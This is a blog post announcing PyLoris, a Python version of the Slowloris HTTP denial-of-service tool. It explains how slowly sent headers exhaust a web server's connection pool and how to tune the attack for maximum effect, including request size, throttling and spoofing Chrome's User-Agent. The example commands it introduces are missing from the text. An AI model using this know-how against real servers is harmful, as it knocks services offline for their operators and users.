PyLoris: A Python implementation of Slowloris
I came across a wonderful idea on Hack a Day recently: a Denial of Service attack that overwhelms only the service under attack. After reading through RSnake's two writeups, I decided to take a swing at the code. Thus PyLoris was born.
RSnake's tool, Slowloris, is elegant and effective. Its basic principal is that it sends a large number of HTTP requests to a webserver, keeping the connections open for extended periods of time by continuing to send headers to the server. Because Slowloris never completes a request, and because the popular webservers limit the number of concurrent requests allowed, this will eventually fill all usable connections to the server. The nice side effect of this is that the webserver is the only service that is affected; the network and memory are undamaged leaving all other services on the system fully operational.
PyLoris is written entirely in Python, utilizes only standard modules, is OS and platform independent, and is less than 100 lines of code. It runs a little differently than Slowloris, in that it throttles the entire request, allows users to specify the bandwidth for the connection as well as how large the request is. Unfortunately, the brevity of the code does not leave room for SSL/TLS handling, so only HTTP is supported for the time being.
Here is a brief description of the things PyLoris can do:
If a user wanted to run a basic test against NOM, it would be as simple as:
But this is hardly a thorough test, there is a lot to be done to improve it,
- it limits the total number of requests made to a meager 50
- it sends a relatively small request
- it requests a page that doesn't exists
- it advertises PyLoris in the User-Agent (err...)
A more malicious individual might perform a test like so:
This test will pound the server with an unyeilding number of requests, each request over 600 kB in length, starting 10 connections per second, each throttled at 25 B/s, and masquerading as Google Chrome. As stated before, PyLoris runs on Linux, Windows, and Mac OS X. Additionally, it should work on any platform capable of running Python with Threads. If you download the script and find any errors or bugs to report, please submit them via SourceForge.
comments powered by Disqus